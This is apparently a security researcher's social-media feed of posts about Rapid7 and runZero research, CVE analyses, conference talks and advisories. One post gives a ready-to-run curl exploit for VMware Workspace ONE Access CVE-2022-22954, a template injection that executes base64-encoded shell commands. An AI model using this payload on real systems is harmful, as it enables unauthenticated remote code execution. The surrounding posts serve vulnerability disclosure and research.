Matthew Kienow
@HacksForProfit
hacks for fun and profit / software engineer / security researcher PGP: 9DCD 23A2 0181 B684 C21C 0ED2 9903 D880 6069 F788
🎥 Missed runZero Hour live? Catch it on demand! We recap Hacker Summer Camp highlights: ✅ @hdmoore on SSH vulns + SSHamble updates ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ OT protocol insights from Rob King 👉 runzero.com/resources/runz…
🎙 Hacker Summer Camp recap drops today on runZero Hour! ✅ @hdmoore on SSH vulns + SSHamble ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ Rob King on OT detection across protocol gateways. 📅 Aug 20 | 10AM PT 🔗 runzero.com/research/runze…
🗣️ Happening today at Black Hat Arsenal! Join @HacksForProfit & @Percent_X at 11am PDT for a live demo of Akheron Proxy, a tool for bridging, capturing, replaying, and manipulating UART inter-chip communications. 📍 Business Hall, Arsenal Station 9 🔗 runzero.com/black-hat-arse…
I'm excited to announce our "Out-of-Band" series, focused on the security risks of management devices like BMCs, serial servers, and KVMs. "Out-of-Band, Part 1: The new generation of IP KVMs and how to find them" is now live at: runzero.com/blog/oob-p1-ip…
A PSA for why you should probably not use Postman (it can leak secrets to them): anonymousdata.medium.com/postman-is-log…
I spoke with @robertvamosi on the ErrorCode podcast a while back on "Hacking Cellular-Enabled IoT Devices". We had a fun conversation. The podcast was just published so please check it out - errorcode.podbean.com/e/ep-52-hackin…
EP 52: Hacking Cellular-Enabled IoT Devices | Error Code
We have just published our AttackerKB @rapid7 Analysis for CVE-2024-47575, the recent FortiManager 0day, aka FortiJump 🔥 Read our full technical analysis, detailing firmware decryption, protocol analysis, and unauthenticated RCE 🚀 attackerkb.com/topics/OFBGprm…
CVE and vendor advisory now available on the #FortiManager 0day that's been knocking around the rumor mill (and evidently some Fortinet customers' email inboxes) for a while. Mitigate immediately, but IOCs need investigating, too. rapid7.com/blog/post/2024…
Rapid7's 2024 Attack Intelligence Report was released today and includes insights from 14 months of vulnerability and exploit analysis, thousands of ransomware incidents, 180+ APT campaigns, and a year+ of Rapid7 incident response findings. rapid7.com/research/repor…
I see "Not all vulnerabilities are created equal" pop up a lot these days in marketing materials for various security companies. We may not have truly been the first to coin that phrase, but AttackerKB's been using it since early 2020! attackerkb.com/about
Full @rapid7 analysis of PAN-OS CVE-2024-3400 now available from @stephenfewer and our stellar new research teammate @ChairNectar! Spoiler: It's a two-vuln exploit chain. attackerkb.com/topics/SSTk336…
CVE-2024-3400 | AttackerKB
On April 12, 2024, Palo Alto Networks published an advisory for a critical unauthenticated command injection vulnerability affecting several recent versions of…
Really excited to be speaking at @defcon this year! My talk is titled "SpamChannel: Spoofing Emails from +2M Domains and Virtually becoming Satan" Love/hate Email security? Want your phishing campaigns to be a whole lot easier? You should def come to my talk! 😈 #defcon31
Excellent technical analysis
Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to @iagox86, @stephenfewer, and @_CField for their work on this. attackerkb.com/topics/mXmV0Yp…
Ahoy! I'm looking for an attack + vulnerability research leader to join @iagox86 and @stephenfewer in driving 0day + n-day research, identifying/developing new attack techniques, and helping set overall research strategy. U.S. ET time zone, job description coming soon. DMs open!
Advisory for a number of document management system (DMS) vulnerabilities I discovered. #XSS rapid7.com/blog/post/2023…
Multiple DMS XSS (CVE-2022-47412 through CVE-2022-47419) | Rapid7 Blog
Today is the day! The Metasploit pivoting walkthrough challenge is live on tryhackme.com/christmas. It's free to sign up!
Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
Rapid7's vulnerability intelligence report is out today and features analysis from folks like @Junior_Baines, @zeroSteiner, @tychos_moose and a bunch of the @metasploit team. We tracked hundreds of data points across 50 high-impact vulns. Key points: (1/n) rapid7.com/info/2021-vuln…